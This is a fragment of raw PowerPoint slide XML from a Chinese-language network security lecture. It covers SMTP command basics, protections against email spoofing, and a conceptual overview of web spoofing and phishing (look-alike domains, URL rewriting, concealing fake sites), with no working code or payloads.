            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2060575"/>
            <a:ext cx="3455988" cy="3898900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>直接连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>端口，然后发送命令，常见命令为</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Helo(or EHLO)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Mail from:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Rcpt to:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Quit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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50883" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>邮件服务器的验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务器验证发送者的身份，以及发送的邮件地址是否与邮件服务器属于相同的域</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>验证接收方的域名与邮件服务器的域名是否相同</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>有的也验证发送者的域名是否有效，通过反向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>解析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不能防止一个内部用户假冒另一个内部用户发送邮件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250882" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>邮件欺骗的保护</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1FAF56A-2195-4DE9-BEC9-17E00E4E8D22}"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0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build="p"/>
    </p:bld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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗根源在于：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的开放性，任何人都可以建立自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>站点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>站点名字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可以自由注册，按先后顺序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>并不是每个用户都清楚</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的运行规则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗的动机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>商业利益，商业竞争，政治目的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗的形式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用相似的域名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>改写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251906" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E79D13CD-33FE-45CC-92B7-500570A781B8}"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19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190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19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19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190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190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190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19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1" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>注册与目标公司或组织相似的域名，建立欺骗网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>例如，针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>公司，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>abc.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>来混淆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>abc.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用类似的域名</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8922149-ED99-45F9-AB2D-B939A9451AFF}"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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪造合法站点及其域名，诱骗受害者访问，窃取敏感信息，如银行账户、信用卡信息等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过邮件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>BBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>站点或搜索引擎进行发布</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包括伪造站点、诱骗访问、掩盖欺骗三个环节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>典型攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>冒充相关人员，系统管理员、银行客服，发送邮件（包含欺骗站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>），诱使受害者访问</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>站点欺骗技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{93DA9FB5-D2BE-4EDA-BC41-B7A462341FFD}"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normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪造：伪造合法站点及其域名，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>诱骗：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪造发件人、模仿合法机构邮件、添加银行标志；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>BBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>站点或搜索引擎进行发布</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪造链接：隐藏伪造站点的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>误导链接、隐晦链接、图形链接、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编程改写状态栏，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马监控用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>访问，替换请求网页</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>掩盖：避免用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>访问欺骗站点时发现被欺骗，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脚本掩盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>窗口相关区域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址栏欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全站点欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪造、诱骗、掩盖</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DE314493-4EA2-4550-ADAF-EABB71E0FB0A}"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4400" smtClean="0"/>
              <a:t>网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400"/>
              <a:t>中存在的安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" smtClean="0"/>
              <a:t>威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="1676400"/>
            <a:ext cx="8218488" cy="4633913"/>
            <a:chOff x="343" y="960"/>
            <a:chExt cx="5177" cy="2919"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6149" name="Oval 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="1824"/>
              <a:ext cx="2880" cy="96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0F0272"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>网络</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6150" name="Line 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2496" y="1584"/>
              <a:ext cx="0"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51" name="Object 7"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2208" y="1200"/>
            <a:ext cx="576" cy="384"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s622434" name="剪辑" r:id="rId1" imgW="2287270" imgH="2155825" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪辑" r:id="rId1" imgW="2287270" imgH="2155825"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 y="1200"/>
                          <a:ext cx="57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8"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4080" y="1296"/>
            <a:ext cx="672" cy="426"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s622435" name="剪辑" r:id="rId3" imgW="4046855" imgH="3352800" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪辑" r:id="rId3" imgW="4046855" imgH="3352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1296"/>
                          <a:ext cx="672"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3" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3840" y="1584"/>
              <a:ext cx="192"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54" name="Object 10"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4560" y="2208"/>
            <a:ext cx="913" cy="529"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s622436" name="剪辑" r:id="rId5" imgW="2287270" imgH="1325880" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪辑" r:id="rId5" imgW="2287270" imgH="132588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2208"/>
                          <a:ext cx="913" cy="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Line 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4320" y="2304"/>
              <a:ext cx="19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56" name="Object 12"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3744" y="3024"/>
            <a:ext cx="816" cy="576"/>
